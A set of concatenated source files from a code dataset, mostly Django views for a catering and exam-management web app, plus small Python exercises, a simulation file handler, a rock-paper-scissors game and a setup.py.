never_cache\n\n@register.filter\ndef string(value):\n return str(value)\n\n@register.filter\ndef get_range(value):\n return range(value)\n\n@register.filter\ndef get_pos(value):\n return int( value.split('.')[0][-1])+1\n\n@register.filter\ndef set_value(value):\n return 0\n\n@register.filter\ndef incre(value):\n return value+str(1)\n\n@register.filter\ndef test_range(value):\n return value<=5\n\n@register.filter\ndef list_to_string(val):\n return ', '.join(val)\n\ndef gallery(request, id):\n try:\n if request.session[str(id)]:\n dic=dict(SignupCateringService.objects.get(pk=id))\n if CateringGallery.objects.filter(id=id).exists():\n dic['gallery']=dict(CateringGallery.objects.get(id=id))\n return render(request, 'home_catering/gallery.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef addgallery(request, id):\n if request.method==\"POST\":\n try:\n img = request.FILES['imgs']\n \n user_name=SignupCateringService.objects.get(id =id).name\n fs = FileSystemStorage(location='media/gallery/catering/'+user_name)\n ext = img.name.split('.')[-1]\n\n if not(CateringGallery.objects.filter(pk=id).exists()):\n fs.save(user_name+str(0)+'.'+ext, img)\n pic_insert= '/media/gallery/catering/'+user_name+'/'+user_name+str(0)+'.'+ext\n CateringGallery.objects.create(id=id, gallery_pic=[pic_insert])\n else:\n 
obj=CateringGallery.objects.get(pk=id)\n len_obj=len(obj.gallery_pic)\n pos_value=[]\n for x in obj.gallery_pic:\n pos_value.append(int(x.split('.')[0][-1]))\n\n if len_obj<6:\n for x in range(len_obj+1):\n if x not in pos_value:\n fs.save(user_name+str(x)+'.'+ext, img)\n pic_insert= '/media/gallery/catering/'+user_name+'/'+user_name+str(x)+'.'+ext\n break\n \n CateringGallery.objects(id=id).update(gallery_pic__append=[pic_insert])\n \n return redirect('cateringgallery', id=id)\n except:\n return redirect('cateringgallery', id=id)\n else:\n return redirect('cateringgallery', id=id)\n\ndef delete(request, id, pos):\n user=SignupCateringService.objects.get(id =id)\n fs = FileSystemStorage(location='media/gallery/catering/'+user.name)\n gallery= CateringGallery.objects.get(id =id)\n pic_img=gallery.gallery_pic\n z=0\n for x in pic_img:\n if pos == int(x.split('.')[0][-1]):\n del_name=x.split('/')[-1]\n pic_img.pop(z)\n break\n z+=1\n gallery.update(gallery_pic=pic_img)\n fs.delete(del_name)\n return redirect('cateringgallery', id=id)\n\ndef home(request, id): \n try:\n if request.session[str(id)]:\n\n dic=dict(SignupCateringService.objects.get(pk= id))\n\n dic['names']=json.dumps([x.name for x in SignupCateringBoy.objects.all()])\n dic['home']='home'\n dic['current_catering']=[]\n hist_obj= CateringBoyOrder.objects.filter(cid=id)\n if hist_obj.exists():\n for obj in hist_obj:\n details=dict(obj) \n ss=str(details['timing']).split(\":\")\n details['time']=time(int(ss[0]),int(ss[1])).strftime('%I:%M %p')\n if details['catboy_max']<1:\n details['count_empty']=1\n dic['current_catering'].append(details)\n dic['current_catering'].sort(key=lambda xx:xx['date'])\n dic['list_catboy']=list(SignupCateringBoy.objects.all().limit(2))\n\n dic['current_request']=[]\n for x in CateringServiceOrder.objects.filter(receiver_id=id):\n dic['current_request'].append(x)\n\n dic['current_request'].sort(key=lambda xx:xx['date'])\n return render(request, 'home_catering/home.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef order(request, id):\n try:\n if request.session[str(id)]:\n a=dict(SignupCateringService.objects.get(id=id)) \n request.session['catering']=1\n return render(request, 'home_catering/order.html', a)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef createOrder(request, id):\n if request.method=='POST':\n add= request.POST['add']\n city= request.POST['city']\n pincode= request.POST['pincode']\n catboy= request.POST['nocatboy']\n amount= request.POST['amount']\n date= request.POST['date']\n time= request.POST['time']\n mobile=str(request.POST['mobile'])\n phone =str(request.POST['phone'])\n orderid= uuid.uuid4()\n \n CateringBoyOrder.objects.create(id= orderid,cid=id,amount=amount,date=date, timing=time, catboy_max=catboy,\n venue={'address':add+','+city+','+pincode,'mobile':mobile, 'phone':phone, 'location':city},count=catboy,\n )\n return redirect('homecatering', id=id)\n else:\n return redirect('cateringorder', id=id)\n\ndef dictProdSum(dic):\n sum_ = 0 \n for list_ in dic:\n prod=1\n for val in list_:\n prod*=val\n sum_+=prod\n return sum_\n\ndef foodList(request, id):\n try:\n if request.session[str(id)]:\n dic ={\"id\":id}\n if CateringBreakfast.objects.filter(pk=id).exists():\n dic['mrng_veg']= CateringBreakfast.objects.get(pk=id).foods\n \n dic['mrng_veg_total']=dictProdSum(dic['mrng_veg'].values())\n\n if CateringLunchVeg.objects.filter(pk=id).exists():\n dic['lunch_veg']= 
CateringLunchVeg.objects.get(pk=id).foods\n \n dic['lunch_veg_total']=dictProdSum(dic['lunch_veg'].values())\n \n if CateringLunchNonveg.objects.filter(pk=id).exists():\n dic['lunch_non']= CateringLunchNonveg.objects.get(pk=id).foods\n \n dic['lunch_non_total']=dictProdSum(dic['lunch_non'].values())\n \n if CateringDinnerVeg.objects.filter(pk=id).exists():\n dic['dinner_veg']= CateringDinnerVeg.objects.get(pk=id).foods\n \n dic['dinner_veg_total']=dictProdSum(dic['dinner_veg'].values())\n \n if CateringDinnerNonveg.objects.filter(pk=id).exists():\n dic['dinner_non']= CateringDinnerNonveg.objects.get(pk=id).foods\n \n dic['dinner_non_total']=dictProdSum(dic['dinner_non'].values())\n\n return render(request, 'home_catering/foodlist.html', dic)\n\n else:\n return redirect('login')\n except:\n return redirect('logout', service=id)\n\ndef addBreakfast(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringBreakfast.objects.filter(pk=id).exists()):\n CateringBreakfast.objects.create(id = id, foods={ foodname: [foodprice,foodcount]})\n \n else:\n CateringBreakfast.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount] })\n \n return redirect('createfoodlist', id=id)\n\ndef addLunchVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringLunchVeg.objects.filter(pk=id).exists()):\n CateringLunchVeg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringLunchVeg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef addLunchNonVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringLunchNonveg.objects.filter(pk=id).exists()):\n CateringLunchNonveg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringLunchNonveg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef addDinnerVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringDinnerVeg.objects.filter(pk=id).exists()):\n CateringDinnerVeg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringDinnerVeg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef addDinnerNonVeg(request, id):\n foodname =request.POST['foodname']\n foodprice = request.POST['foodprice']\n foodcount= request.POST['foodcount']\n\n if not(CateringDinnerNonveg.objects.filter(pk=id).exists()):\n CateringDinnerNonveg.objects.create(id = id, foods={foodname: [foodprice,foodcount]})\n \n else:\n CateringDinnerNonveg.objects(pk=id).update(foods__add={foodname: [foodprice,foodcount]})\n \n return redirect('createfoodlist', id=id)\n\ndef deleteBreakfast(request, id, value):\n CateringBreakfast.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteLunchVeg(request, id, value):\n CateringLunchVeg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteLunchNonVeg(request, id, value):\n CateringLunchNonveg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef 
deleteDinnerVeg(request, id, value):\n CateringDinnerVeg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef deleteDinnerNonVeg(request, id, value):\n CateringDinnerNonveg.objects(pk=id).update(foods__remove={value})\n return redirect('createfoodlist', id=id)\n\ndef viewOrder(request, id):\n try:\n if request.session[str(id)]:\n dic=dict(SignupCateringService.objects.get(pk=id))\n dic['current_catering']=[]\n hist_obj= CateringBoyOrder.objects.filter(cid=id)\n if hist_obj.exists():\n for obj in hist_obj:\n details=dict(obj) \n ss=str(details['timing']).split(\":\")\n details['time']=time(int(ss[0]),int(ss[1])).strftime('%I:%M %p')\n if details['catboy_max']<1:\n details['count_empty']=1\n dic['current_catering'].append(details)\n dic['current_catering'].sort(key=lambda xx:xx['date'])\n\n dic['service_book']=[]\n for x in CateringServiceOrder.objects.filter(receiver_id=id):\n dic['service_book'].append(x)\n\n dic['service_book'].sort(key=lambda xx:xx['date'])\n\n return render(request, 'home_catering/vieworders.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef viewServiceOrder(request, id, cid, type, date):\n try:\n if request.session[str(id)]:\n objects= CateringServiceOrder.objects.get(receiver_id=id ,booker_id =cid, reg_type=type, date=date)\n dic = {'id': id}\n dic['obj']=dict(objects)\n if SignupMahalService.objects.filter(pk=objects.booker_id).exists():\n dic['rev']=dict(SignupMahalService.objects.get(pk=objects.booker_id))\n \n elif SignupCustomer.objects.filter(pk=objects.booker_id).exists():\n dic['rev']=dict(SignupCustomer.objects.get(pk=objects.booker_id))\n\n dic['per']=dic['obj']['amount']//dic['obj']['plates']\n return render(request, 'home_catering/viewrequest.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef acceptRequest(request, id, cid, type, date):\n objects= CateringServiceOrder.objects.get(receiver_id=id ,booker_id =cid, reg_type=type, date=date)\n objects.update(status=\"accept\")\n return redirect('viewcateringrequest', id=id, cid=cid, type=type, date=date)\n\ndef cancelRequest(request, id, cid, type, date):\n objects= CateringServiceOrder.objects.get(receiver_id=id ,booker_id =cid, reg_type=type, date=date)\n objects.update(status=\"cancel\")\n return redirect('viewcateringrequest', id=id, cid=cid, type=type, date=date)\n\ndef viewCatboyrequest(request, id, oid):\n try:\n if request.session[str(id)]:\n hist_obj= CBorders.objects.filter(oid=oid)\n dic={}\n dic['list_pending']=[]\n dic['list_accept']=[]\n dic['empty']=0\n if hist_obj.exists():\n dic['empty']=1\n for obj in hist_obj:\n if obj.status=='pending':\n x=dict(SignupCateringBoy.objects.get(pk=obj.cbid))\n x['date']=obj.date\n dic['list_pending'].append(x)\n else:\n x=dict(SignupCateringBoy.objects.get(pk=obj.cbid))\n x['date']=obj.date\n x['status']=obj.status\n dic['list_accept'].append(x)\n \n dic['id']=id\n dic['oid']=oid\n return render(request,'home_catering/viewcatboyrequest.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n \ndef acceptCatboyrequest(request, id, cid, oid, date):\n obj_status=CBorders.objects.get(cbid=cid, oid=oid, date=date)\n obj_cbcount= CateringBoyOrder.objects.get(pk=oid)\n \n obj_status.update(status='accept')\n obj_cbcount.update(catboy_max= obj_cbcount.catboy_max -1)\n if obj_cbcount.catboy_max==1:\n CBorders.objects.filter(oid=oid, status='pending').delete()\n\n return 
redirect('viewcatboyrequestbycatering', id=id,oid = oid)\n\ndef completeCatboyrequest(request, id, cid, oid, date):\n obj_status=CBorders.objects.get(cbid=cid, oid=oid, date=date)\n \n obj_status.update(status='complete')\n return redirect('viewcatboyrequestbycatering', id=id,oid = oid)\n\ndef history(request, id):\n try:\n if request.session[str(id)]:\n hist_catboy= CateringBoyOrder.objects.filter(cid=id)\n dic={'id':id}\n dic['catboy_order']=[]\n \n for hist in hist_catboy:\n details=dict(hist) \n ss=str(details['timing']).split(\":\")\n details['time']=time(int(ss[0]),int(ss[1])).strftime('%I:%M %p')\n dic['catboy_order'].append(details)\n\n hist_request= CateringServiceOrder.objects.filter(receiver_id=id) \n dic['request']=[] \n for hist in hist_request:\n if hist.status==\"complete\":\n dic['request'].append(hist)\n return render(request,'home_catering/history.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n \ndef earnings(request, id):\n try:\n if request.session[str(id)]:\n dic={'id':id}\n\n hist_request= CateringServiceOrder.objects.filter(receiver_id=id) \n total=0\n dic['request']=[] \n for hist in hist_request:\n if hist.status==\"complete\":\n total+=hist.amount\n dic['request'].append(hist)\n dic['total']=total\n return render(request,'home_catering/earning.html', dic)\n else:\n return redirect('login')\n except:\n return redirect('logout',service=id)\n\ndef searchCatboy(search):\n search_list=[] \n list_value=SignupCateringBoy.objects.all()\n for value in list_value:\n if search.lower() in value.name.lower():\n search_list.append(dict(value))\n return search_list\n\ndef searchCatboyList(request,id):\n try:\n if request.session[str(id)]:\n search_list={}\n try:\n search=request.POST['q']\n request.session[str(id)]={'search':search}\n except:\n search=request.session[str(id)]['search']\n\n \n pag= request.GET.get('page_catering',1)\n\n pagnator=Paginator(searchCatboy(search),1)\n try:\n des=pagnator.page(pag)\n except PageNotAnInteger:\n des=pagnator.page(1)\n except EmptyPage:\n des=pagnator.page(pagnator.num_pages)\n\n search_list['catering']=des\n \n search_list['id']=id\n search_list['search']=search\n return render(request, 'home_catering/viewcatboy.html', search_list)\n \n else:\n \n return redirect('login')\n except:\n return redirect('logout', service=id)\n\ndef viewCatboyList(request, id):\n try:\n if request.session[str(id)]:\n search_list={}\n \n \n pag= request.GET.get('page_catering',1)\n\n pagnator=Paginator(SignupCateringBoy.objects.all(),1)\n try:\n des=pagnator.page(pag)\n except PageNotAnInteger:\n des=pagnator.page(1)\n except EmptyPage:\n des=pagnator.page(pagnator.num_pages)\n\n search_list['catering']= des\n search_list['search']=''\n search_list['id']=id\n return render(request, 'home_catering/viewcatboy.html', search_list)\n \n else:\n \n return redirect('login')\n except:\n return redirect('logout', service=id)\n\n","repo_name":"ilmnmukesh/Cassandra-django_CMS","sub_path":"home_catering/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"34147259356","text":"from logging.config import valid_ident\r\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\r\nfrom django.shortcuts import render,redirect\r\nfrom django.urls import reverse\r\nfrom .models import Admin, Staff,Student, User,question_paper\r\nimport random\r\nfrom django.contrib.auth import 
authenticate, login, logout\r\nfrom django.contrib import messages\r\nfrom .forms import AddStudentForm\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n\r\ndef AdminLoginPage(request):\r\n    return render(request,\"Admin/admin_login_page.html\")\r\n\r\n@login_required\r\ndef admin_home(request):\r\n    staff_count = Staff.objects.all().count()\r\n    student_count = Student.objects.all().count()\r\n    question_count = question_paper.objects.all().count()\r\n    return render(request, 'Admin/admin_home.html',{\"staff_count\":staff_count,\"student_count\":student_count,\"question_count\":question_count})\r\n\r\n@login_required\r\ndef admin_staff_view(request):\r\n    staffs=Staff.objects.all() \r\n    staff_name_list=[]\r\n    for staff in staffs:\r\n        staff_name_list.append(staff.admin.username)\r\n    \r\n    return render(request, 'Admin/admin_staff_view.html',{ 'staff_list':staffs})\r\n\r\n@login_required\r\ndef admin_student_view(request):\r\n    students=Student.objects.all()\r\n    student_name_list=[]\r\n\r\n    for student in students:\r\n        student_name_list.append(student.admin.username)\r\n    return render(request, 'Admin/admin_student_view.html', {'student_list':students})\r\n\r\n@login_required\r\ndef delete(request, id):\r\n    staff = User.objects.get(id=id)\r\n    staff.delete()\r\n    return redirect('admin_staff_view')\r\n\r\n@login_required\r\ndef add_student(request):\r\n    form=AddStudentForm()\r\n    return render(request,\"Admin/add_student_form.html\",{\"form\":form})\r\n\r\n@login_required\r\ndef add_student_save(request):\r\n    if request.method!=\"POST\":\r\n        return HttpResponse(\"Method Not Allowed\")\r\n    else:\r\n        form=AddStudentForm(request.POST)\r\n        if form.is_valid():\r\n            first_name=form.cleaned_data[\"first_name\"]\r\n            last_name=form.cleaned_data[\"last_name\"]\r\n            username=form.cleaned_data[\"username\"]\r\n            email=form.cleaned_data[\"email\"]\r\n            password=form.cleaned_data[\"password\"]\r\n            address=form.cleaned_data[\"address\"]\r\n            gender=form.cleaned_data[\"gender\"]\r\n            section=form.cleaned_data[\"section\"]\r\n\r\n            try:\r\n                user=User.objects.create_user(username=username,password=password,email=email,last_name=last_name,first_name=first_name,user_type=3)\r\n                user.student.address=address\r\n                user.student.gender=gender\r\n                user.student.section=section\r\n                user.save()\r\n                messages.success(request,\"Successfully Added Student\")\r\n                return HttpResponseRedirect(reverse(\"add_student_form\"))\r\n            except:\r\n                messages.error(request,\"Failed to Add Student\")\r\n                return HttpResponseRedirect(reverse(\"add_student_form\"))\r\n        else:\r\n            form=AddStudentForm(request.POST)\r\n            return render(request, \"Admin/add_student_form.html\", {\"form\": form})\r\n@login_required\r\ndef question_upload(request):\r\n    return render(request, 'Admin/question_upload.html')\r\n\r\n\r\n@login_required\r\ndef question_paper_save(request):\r\n    if request.method!=\"POST\":\r\n        return HttpResponse(\"Method Not Allowed\")\r\n    else:\r\n        question_name = request.POST.get(\"question_name\")\r\n        paper = request.POST.get(\"url\")\r\n\r\n        try:\r\n            question = question_paper.objects.create(question_name=question_name,paper=paper)\r\n            question.save()\r\n            messages.success(request,\"Successfully Added\")\r\n            return HttpResponseRedirect(reverse(\"question_upload\"))\r\n        except:\r\n            messages.error(request,\"Failed to Add Question Paper\")\r\n            return HttpResponseRedirect(reverse(\"question_upload\"))\r\n\r\n\r\n@csrf_exempt\r\ndef check_username_exist(request):\r\n    
username=request.POST.get(\"username\")\r\n    user_obj=User.objects.filter(username=username).exists()\r\n    if user_obj:\r\n        return HttpResponse(True)\r\n    else:\r\n        return HttpResponse(False)\r\n\r\n@csrf_exempt\r\ndef check_email_exist(request):\r\n    email=request.POST.get(\"email\")\r\n    user_obj=User.objects.filter(email=email).exists()\r\n    if user_obj:\r\n        return HttpResponse(True)\r\n    else:\r\n        return HttpResponse(False)\r\n\r\n\r\n\r\n# @login_required\r\n# def random_question(request):\r\n#     test = question_paper.objects.all()\r\n#     paper_list = []\r\n#     for i in test:\r\n#         i= i.paper\r\n#         paper_list.append(i)\r\n#     print(paper_list)\r\n\r\n#     mode = random.choice(paper_list)\r\n#     print(mode)\r\n#     # return mode\r\n#     return render(request,'baseapp/admin_home.html',{'test':mode})\r\n\r\n@login_required\r\ndef random_question(request):\r\n    test = question_paper.objects.all()\r\n    paper_list = []\r\n    for i in test:\r\n        i= i.paper\r\n        paper_list.append(i)\r\n    print(paper_list)\r\n\r\n    mode = random.choice(paper_list)\r\n    # wrap the randomly chosen paper in an HTTP response so the view returns a valid object\r\n    return HttpResponse(mode)\r\n\r\n","repo_name":"Deepak-28/Online-Examination-System","sub_path":"onlineExam/examapp/Adminviews.py","file_name":"Adminviews.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18817339319","text":"\"\"\"\nFile used to handle the data files created with Interacting_particles\nThe json file will be structured as follows:\n{\n\"parameters\": {\n\"N\": N,\n\"N_p\": N_p,\n\"dt\": dt,\n\"theta\": theta,\n\"gamma\": gamma,\n\"epsilon\": epsilon,\n\"betas\": [beta_1, ..., beta_n],\n},\n\"data_points\": {\n\"beta_1\": [(time, mean) ...],\n\"beta_2\": [(time, mean) ...],\n...\n}\n}\nThe number of (time, mean) points is decided by the user\n\nReturns the betas that have not been computed in the data file\nTODO: Keep the last points if we want to continue a simulation?\n\"\"\"\nimport json\nimport numpy as np\nimport os\n\n\ndef createFile(file_path, N, N_p, dt, θ, γ, ε, βs):\n    \"\"\"\n    Create the .json file if it doesn't exist, and initialize it\n    \"\"\"\n    # -----Parameters-----\n    data = {}\n    data[\"parameters\"] = {\n        \"N\": N,\n        \"N_p\": N_p,\n        \"dt\": dt,\n        \"theta\": θ,\n        \"gamma\": γ,\n        \"epsilon\": ε,\n        \"betas\": list(βs)\n    }\n    data[\"data_points\"] = {\n        f\"{β}\": [\n            # each tuple will be (time, mean)\n        ]\n        for β in βs}\n\n    with open(file_path, \"w\") as file:\n        json.dump(data, file, indent=4)\n\n    return βs\n\n\ndef updateFile(file_path, N, N_p, dt, θ, γ, ε, βs):\n    \"\"\"\n    Check that the stored parameters are the same\n    and return the new betas that must be computed\n    \"\"\"\n\n    # -----Loading-----\n    with open(file_path, \"r\") as file:\n        data = json.load(file)\n        param = data[\"parameters\"]\n\n    # -----Assert parameters-----\n    # Checking if same parameters (unpack the stored values into _-prefixed names so they can be compared against the arguments)\n    _N, _N_p, _dt, _θ, _γ, _ε, _βs = param[\"N\"], param[\"N_p\"], param[\"dt\"], param[\"theta\"], param[\"gamma\"], param[\"epsilon\"], param[\"betas\"]\n    assert (_N, _N_p, _dt, _θ, _γ, _ε) == (\n        N, N_p, dt, θ, γ, ε), f\"A file with the same name exists, but its hyperparameters do not match. 
Please check the values in the file at {file_path}\"\n    \n    βs_union = np.union1d(βs, _βs).tolist()\n    new_βs = np.setdiff1d(βs, _βs).tolist()\n    param[\"betas\"] = βs_union\n\n    with open(file_path, \"w\") as file:\n        json.dump(data, file, indent=4)\n\n    return new_βs\n\n\ndef checkFile(file_path, N, N_p, dt, θ, γ, ε, βs):\n    \"\"\"\n    This checks if the data file already exists.\n    It will look for the file at file_path and create\n    and initialize it if it doesn't exist.\n\n    If the file already exists, the stored parameters are checked\n    against the given ones and the file is updated with the new betas.\n\n    Returns the betas that have not been computed yet.\n    \"\"\"\n\n    if not os.path.isfile(file_path):\n        # If there is no file, create it and set parameters in it\n\n        return createFile(file_path, N, N_p, dt, θ, γ, ε, βs)\n\n    else:\n        # If there is a file update it with new parameters\n\n        return updateFile(file_path, N, N_p, dt, θ, γ, ε, βs)\n","repo_name":"Moddac/IC-Internship-Bifurcation","sub_path":"FileHandler_MCMC.py","file_name":"FileHandler_MCMC.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10746096542","text":"lista= list()\n\na = int(input('Enter the first number: '))\nb = int(input('Enter the second number: '))\nc = int(input('Enter the third number: '))\n\nordemcre = [a, b, c]\n\nprint(\"Values in ascending order\", sorted(ordemcre))\n# or\n\n#for c in range(0,3):\n\n#    n =int(input(\"enter a value: \"))\n#    if c == 0 or n > lista[-1]:\n#        lista.append(n)\n#    else:\n#        pos = 0\n#        while pos < len(lista):\n#            if n <= lista[pos]:\n#                lista.insert(pos, n)\n#                break\n#            pos +=1\n#print(\"-=\" * 30)\n#print(f\"the values entered, in order, were: {lista}\") ","repo_name":"Natan-333/Python","sub_path":"EX28.py","file_name":"EX28.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73333761422","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def oddEvenList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n        if not head or not head.next or not head.next.next:\n            return head\n        \n        even_head = even_curr = head.next\n        odd_curr, curr, even = head, head.next.next, False\n        while curr:\n            if even:\n                even_curr.next, even_curr = curr, curr\n            else:\n                odd_curr.next, odd_curr = curr, curr\n            even, curr = not even, curr.next\n        \n        odd_curr.next, even_curr.next = even_head, None\n        return head","repo_name":"adnanyaqoobvirk/leetcode","sub_path":"328-odd-even-linked-list/328-odd-even-linked-list.py","file_name":"328-odd-even-linked-list.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6701770245","text":"\"\"\"\nModule for handling any text messages that did not fall under the criteria described earlier.\n\"\"\"\n\nfrom telebot.types import Message\n\nfrom loader import bot\n\n\n@bot.message_handler(content_types=['text'])\ndef other_commands_handler(message: Message) -> None:\n    \"\"\"\n    Triggered when a text message is received that the earlier handlers could not process.\n\n    :param message:\n    :return:\n    \"\"\"\n\n    
bot.send_message(message.chat.id, 'Unfortunately I did not recognize your command,\n'\n                                      'please try again or use '\n                                      '/help or the menu.')\n","repo_name":"AlexDubonosov/telegram_bot_currency_rate_searcher","sub_path":"handlers/standart/unknown_message.py","file_name":"unknown_message.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70688256142","text":"import Environment\nimport Progaming\nimport numpy as np\n'''\nAs described in the paper:\n1: we need to obtain an H matrix\n\n'''\n\n# number of users\nuser_number = 4\n\n# number of users per channel\nusers_prechannel = 2\n\n# bandwidth in MHz\nBandWidth = 5\n\n# number of channels (integer division, so it can be used as an array dimension)\nband_number = user_number // users_prechannel\n\n# bandwidth of each channel\nSC_bandwidth = BandWidth/band_number\n\n\ndef H_and_h(user_number,band_number):\n    '''\n    Generate the H and h matrices\n    :param user_number: number of users\n    :param band_number: number of channels\n    :return: H and h\n    '''\n    # H is a matrix\n    H = np.zeros([user_number, band_number])\n    h = np.zeros([user_number, band_number])\n    # each user's H is distinguished by its distance, so generate a distance for every user\n    for i in range(user_number):\n        distance = (500 - 50) * np.random.random_sample() + 50  # the distance is a random position between 50 m and 500 m\n        for j in range(band_number):\n            user_channel = Environment.environment(distance, SC_bandwidth)\n            H[i][j] = user_channel.H\n            h[i][j] = user_channel.h\n    return H,h\n\n","repo_name":"asyqsg/NOMA_GMAE","sub_path":"get_HAndh.py","file_name":"get_HAndh.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41510779131","text":"__author__ = 'Michael'\nfrom src import PClass\n\nclass PLayer(object):\n    def __init__(self, p_num, p_num_inputs):\n        self.m_p_num = p_num\n        # build the list per instance; a class-level list would be shared by every layer\n        self.p_list = []\n        for x in range(0, self.m_p_num):\n            self.p_list.append(PClass(p_num_inputs))\n","repo_name":"michaellee1/ANN-PCML","sub_path":"src/PLayer.py","file_name":"PLayer.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"44258135305","text":"getallen=[1,2,3,5,7,8,10,12,13,14,15,16,21,22,23,24,26,30,31,32,33,43,44,46,47]\n\nnummer = len(getallen)\nprint(nummer)\n\nevengetallen= 0\nonevengetallen= 0\nfor getal in getallen:\n    if getal %2 == 0:\n        evengetallen += 1\n    else:\n        onevengetallen += 1\n\n\nprint(evengetallen)\nprint(onevengetallen)\nBoring = []\nfor i in range(len(getallen)):\n    if i %2 == getallen[i] %2:\n        Boring.append(getallen[i])\n\nprint(len(Boring))\n\n\n\n","repo_name":"Rouamu/challenge","sub_path":"challenge1.py","file_name":"challenge1.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"463154529","text":"import random, sys, time\n\nprint('''\n     ---------------------------------------\n    |  Welcome To Rock Paper Scissors Game! |\n    |  Rock: r                              |\n    |  Paper: p                             |\n    |  Scissors: s                          |\n    |  Good Luck! 
|\n --------------------------------------\n''')\nplayer_score = 0\ncomputer_score = 0\ndef Game(player_score, computer_score):\n moves = ['r', 'p', 's'] #available moves\n player_wins = ['pr', 'sp', 'rs'] #combination of when player wins\n\n while True: #while user wants to play, ask again\n player_move = input(\"Your Move: \")#getting user's move\n if player_move not in moves:\n print(\"Invalid Move.\")\n continue\n computer_move = random.choice(moves) #computer makes random choice\n print(\"Computer's Move: \", computer_move)\n if player_move == computer_move:\n print(\"Tie\")\n elif player_move+computer_move in player_wins:\n player_score += 1 \n print(\"You Win!\")\n else:\n computer_score += 1\n print(\"You Lose.\")\n while True: #checking for is user wants to play again\n answer = input(\"Play again? (y/n): \") \n if answer not in ('y', 'n'):\n print(\"Invalid Input\")\n continue\n if answer == 'y':\n Game(player_score, computer_score) # also we need to pass the variables if we want to use them in next game() \n sys.exit()\n else:\n print(\"Your score:\", int(player_score))\n print(\"Computer's score:\", int(computer_score))\n print(\"Goodbye!\")\n time.sleep(3)\n sys.exit()\n \n\nGame(player_score, computer_score)\n","repo_name":"doganaktarr/Simple-Python-Projects","sub_path":"Rock Paper Scissors Game/rock_paper_scissors_game.py","file_name":"rock_paper_scissors_game.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70235607503","text":"import setuptools\r\n\r\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\r\n long_description = fh.read()\r\n\r\nsetuptools.setup(\r\n name=\"example-pkg-yuval-shaul\",\r\n version=\"0.0.1\",\r\n author=\"Yuval Shaul\",\r\n author_email=\"yuval.shaul@gmail.com\",\r\n description=\"Classes to make your aws code easier.\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/YuvalShaul/easyawslib\",\r\n packages=setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n python_requires='>=3.6',\r\n)","repo_name":"YuvalShaul/easyawslib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"45257604874","text":"import functools\r\nfrom typing import Union, Tuple\r\n\r\nimport numpy as 